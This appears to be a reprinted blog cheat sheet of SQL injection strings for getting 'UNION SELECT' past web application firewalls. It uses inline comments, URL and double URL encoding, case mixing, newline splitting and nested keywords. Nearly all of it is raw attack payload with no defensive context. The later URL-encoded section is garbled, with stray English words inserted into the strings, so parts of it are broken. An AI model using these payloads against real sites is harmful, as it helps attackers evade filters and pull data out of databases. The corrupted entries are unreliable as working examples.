# # # #WAF bypassing Strings:/*!%55nion*/ /*!%53elect*/%55nion (%53elect1,2,3)---+union+distinct+Select+ +union+distinctrow+Select+/**//*!12345union SELECT*//**/ /**//*!50000union SELECT*//**/ /**/UNION/**//*!50000select*//**/ /*!50000union SeLeCt*/Union/*!50000%53elect*/+ #uNiOn +#sEleCt+ #1q%0aunion all#qa%0a#%0AsEleCt/*!%55nion*/ /*!%53elect*/ /*!u%6eion*/ /*!se%6cect*/+un/**/Ion+se/**/lect Uni%0bon+se%0blect%2f**%2funion%2f**%2fselect Union%23foo*%2f*bar%0d%0aselect%23foo%0d%0A REVERSE (Noinu)+REVERSE (tceles)/*--*/Union/*--*/Select/*--*/Union (/*!/**/SeleCT */1,2,3) /*!union*/+/*!select*/Union+/*!select*/ /**/Union/**/Select/**/ /**/UNIon/**/SEleCt/**/ /**//*!union*//**//*!select*//**/ /*!union*/ /*! SelECt*/+union+distinct+Select+ +union+distinctrow+Select+ +union%0d%0aselect%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/un? +un/**/Ion+se/**/lect+ +ununionion+seselectlect+ +uni%0bon+se%0blect+%252f%252a*/union%252f%252a/Select%252f%252a*//%2a%2a/union/%2a%2a/Select/%2a%2a/%2f**%2funion%2f**%2fselect%2f**%2f Union%23foo*%2f*bar%0d%0aselect%23foo%0d%0A/*! UnIoN*/select+# # # #Union Select by PASS with URL encoded Method:%55nion (%53elect) Union%20distinct%20SelectUnion% -%64istinctro% $%20SelectUnion%2053elect% at?%0 auion% -?% at?%0aselect% at? zen?%0 Aunion all%23zen%0a%23zen%0Aselect%55nion%53eLEct u%6eion se%6cect Unio%6e%73elect Unio%6e% -%64istinc% About% -%73elect Uni%6FN Distinct%52ow s%65lect% the%6e%6f% the%6e% A%6c%6c% the% $%6c% $% the%7
reprint [email protected] Blog: http://www.cnblogs.com/perl6/p/6120045.html#3573210
SQL injection bypasses Union select filtering